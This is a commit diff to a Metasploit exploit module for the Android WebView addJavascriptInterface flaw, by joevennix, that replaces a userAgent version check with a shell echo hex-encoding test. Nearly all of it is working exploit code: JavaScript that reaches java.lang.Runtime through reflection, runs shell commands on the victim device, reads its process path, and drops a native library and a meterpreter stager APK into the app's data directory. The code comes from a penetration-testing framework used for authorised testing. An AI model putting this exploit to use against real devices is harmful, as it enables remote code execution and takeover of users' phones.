Add a test on echo to check for hex support.

* This is much nicer than checking version on userAgent, which
is often changed when rendered in an embedded webview.

Author: joevennix

modules/exploits/android/browser/webview_addjavascriptinterface.rb

@@ -28,20 +28,12 @@ class Metasploit3 < Msf::Exploit::Remote
     :os_flavor  => 'Android',
     :javascript => true,
     :rank       => ExcellentRanking,
-
-    # The Android 4.0 shell is different than other versions of android
-    # in that the echo builtin does not allow the \x hex encoding syntax.
-    # Android 4.0 is still vulnerable to the Java reflection exploit, but
-    # until we find a way to drop and run the payload, we can't support
-    # it as a target.
     :vuln_test  => %Q|
-      if (!navigator.userAgent.match(/Android 4\.0;/)) {
-        for (i in top) {
-          try {
-            top[i].getClass().forName('java.lang.Runtime');
-            is_vuln = true; break;
-          } catch(e) {}
-        }
+      for (i in top) {
+        try {
+          top[i].getClass().forName('java.lang.Runtime');
+          is_vuln = true; break;
+        } catch(e) {}
       }
     |
   )
@@ -97,6 +89,8 @@ def initialize(info = {})
   def on_request_uri(cli, req)
     if req.uri =~ /\.js/
       serve_static_js(cli, req)
+    elsif req.uri =~ /\.msg/ && req.body.to_s.length < 100
+      print_warning "Received message: #{req.body}"
     else
       super
     end
@@ -119,7 +113,17 @@ def ndkstager(stagename, arch)
   def js(arch)
     stagename = Rex::Text.rand_text_alpha(5)
     script = %Q|
-      function exec(obj) {
+      function exec(runtime, cmdArr) {
+        var ch = 0;
+        var output = '';
+        var process = runtime.exec(cmdArr);
+        var input = process.getInputStream();
+
+        while ((ch = input.read()) > 0) { output += String.fromCharCode(ch); }
+        return output;
+      }
+
+      function attemptExploit(obj) {
         // ensure that the object contains a native interface
         try { obj.getClass().forName('java.lang.Runtime'); } catch(e) { return; }
 
@@ -135,6 +139,19 @@ def js(arch)
                          .getMethod('getRuntime', null)
                          .invoke(null, null);
 
+        // now ensure we can write out a hex-encoded byte with the shell's echo builtin
+        var byte = exec(runtime, ['/system/bin/sh', '-c', 'echo "\\\\x66"']);
+        if (byte.indexOf("\\\\") > -1) {
+          // if youre havin byte problems
+          var xml = new XMLHttpRequest();
+          // i feel bad for you son
+          xml.open('POST', '#{get_module_resource}.msg', false);
+          // i got \\x63 problems
+          xml.send("Unsupported shell echo builtin: exploit aborted.");
+          // but your shell aint one
+          return true;
+        }
+
         // libraryData contains the bytes for a native shared object built via NDK
         // which will load the "stage", which in this case is our android meterpreter stager.
         // LibraryData is loaded via ajax later, because we have to access javascript in
@@ -147,9 +164,7 @@ def js(arch)
 
         // get the process name, which will give us our data path
         // $PPID does not seem to work on android 4.0, so we concat pids manually
-        var p = runtime.exec(['/system/bin/sh', '-c', 'cat /proc/'+pid.toString()+'/cmdline']);
-        var ch, path = '/data/data/';
-        while ((ch = p.getInputStream().read()) > 0) { path += String.fromCharCode(ch); }
+        var path = '/data/data/' + exec(runtime, ['/system/bin/sh', '-c', 'cat /proc/'+pid.toString()+'/cmdline']);
 
         var libraryPath = path + '/lib#{Rex::Text.rand_text_alpha(8)}.so';
         var stagePath = path + '/#{stagename}.apk';
@@ -172,9 +187,7 @@ def js(arch)
         return true;
       }
 
-      if (!navigator.userAgent.match(/Android 4\.0;/)) {
-        for (i in top) { if (exec(top[i]) === true) break; }
-      }
+      for (i in top) { if (attemptExploit(top[i]) === true) break; }
     |
 
     # remove comments and empty lines